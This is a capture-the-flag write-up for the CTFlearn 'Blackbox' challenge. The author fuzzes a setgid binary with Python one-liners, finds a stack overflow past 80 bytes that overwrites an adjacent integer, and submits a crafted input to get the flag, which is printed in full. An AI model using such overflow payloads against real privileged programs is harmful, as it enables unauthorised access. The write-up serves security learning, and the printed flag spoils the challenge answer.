Blackbox
3 minutes to read
We are given a server to connect using SSH. There is a binary called blackbox
that is SGID:
blackbox@ubuntu-512mb-nyc3-01:~$ ls -l
total 16
---x--s--x 1 root blackbox_pwn 8936 Jan 31 2019 blackbox
-r--r----- 1 root blackbox_pwn 33 Oct 9 2017 flag.txt
blackbox@ubuntu-512mb-nyc3-01:~$ file blackbox
blackbox: setgid executable, regular file, no read permission
As it can be seen, we have no read permission, so we cannot transfer the file to our machine, or decompile it, or debug it. The only thing we can do is run it:
blackbox@ubuntu-512mb-nyc3-01:~$ ./blackbox
What is 1 + 1 =
We have only that user input. If we answer the question, we get:
blackbox@ubuntu-512mb-nyc3-01:~$ ./blackbox
What is 1 + 1 = 2
No dummy... 1 + 1 != 0...
If we fuzz this input using Python, we get a *** stack smashing detected ***
message:
blackbox@ubuntu-512mb-nyc3-01:~$ python3 -c 'print("A" * 100)' | ./blackbox
What is 1 + 1 = No dummy... 1 + 1 != 1094795585...
*** stack smashing detected ***: <unknown> terminated
[1]+ Stopped python3 -c 'print("A" * 100)' | ./blackbox
So the binary has a stack canary that protects from buffer overflows. We can decrease the amount of characters until we find this behavior:
blackbox@ubuntu-512mb-nyc3-01:~$ python3 -c 'print("A" * 80)' | ./blackbox
What is 1 + 1 = No dummy... 1 + 1 != 0...
blackbox@ubuntu-512mb-nyc3-01:~$ python3 -c 'print("A" * 81)' | ./blackbox
What is 1 + 1 = No dummy... 1 + 1 != 65...
blackbox@ubuntu-512mb-nyc3-01:~$ python3 -c 'print("A" * 82)' | ./blackbox
What is 1 + 1 = No dummy... 1 + 1 != 16705...
blackbox@ubuntu-512mb-nyc3-01:~$ python3 -c 'print("A" * 83)' | ./blackbox
What is 1 + 1 = No dummy... 1 + 1 != 4276545...
blackbox@ubuntu-512mb-nyc3-01:~$ python3 -c 'print("A" * 84)' | ./blackbox
What is 1 + 1 = No dummy... 1 + 1 != 1094795585...
blackbox@ubuntu-512mb-nyc3-01:~$ python3 -c 'print("A" * 85)' | ./blackbox
What is 1 + 1 = No dummy... 1 + 1 != 1094795585...
blackbox@ubuntu-512mb-nyc3-01:~$ python3 -c 'print("A" * 86)' | ./blackbox
What is 1 + 1 = No dummy... 1 + 1 != 1094795585...
blackbox@ubuntu-512mb-nyc3-01:~$ python3 -c 'print("A" * 87)' | ./blackbox
What is 1 + 1 = No dummy... 1 + 1 != 1094795585...
blackbox@ubuntu-512mb-nyc3-01:~$ python3 -c 'print("A" * 88)' | ./blackbox
What is 1 + 1 = No dummy... 1 + 1 != 1094795585...
blackbox@ubuntu-512mb-nyc3-01:~$ python3 -c 'print("A" * 89)' | ./blackbox
What is 1 + 1 = No dummy... 1 + 1 != 1094795585...
*** stack smashing detected ***: <unknown> terminated
[2]+ Stopped python3 -c 'print("A" * 89)' | ./blackbox
If we take the numbers and print them in hexadecimal, we will see what is happening:
>>> hex(65)
'0x41'
>>> hex(16705)
'0x4141'
>>> hex(4276545)
'0x414141'
>>> hex(1094795585)
'0x41414141'
It seems clear that the result we need to enter "\x02"
where there is a single "A"
(0x41
). That is, we need to enter 80 characters and the next character must be "\x02"
, so that the question has a correct answer:
blackbox@ubuntu-512mb-nyc3-01:~$ python3 -c 'print("A" * 80 + "\x02")' | ./blackbox
What is 1 + 1 = CORRECT! You get flag:
CTFlearn{0n3_4lus_1_1s_Tw0_dumm13!!}
[3]+ Stopped python3 -c 'print("A" * 80 + "\x02")' | ./blackbox
Or even shorter:
blackbox@ubuntu-512mb-nyc3-01:~$ python3 -c 'print("\x02" * 81)' | ./blackbox
What is 1 + 1 = CORRECT! You get flag:
CTFlearn{0n3_4lus_1_1s_Tw0_dumm13!!}
[3]+ Stopped python3 -c 'print("\x02" * 81)' | ./blackbox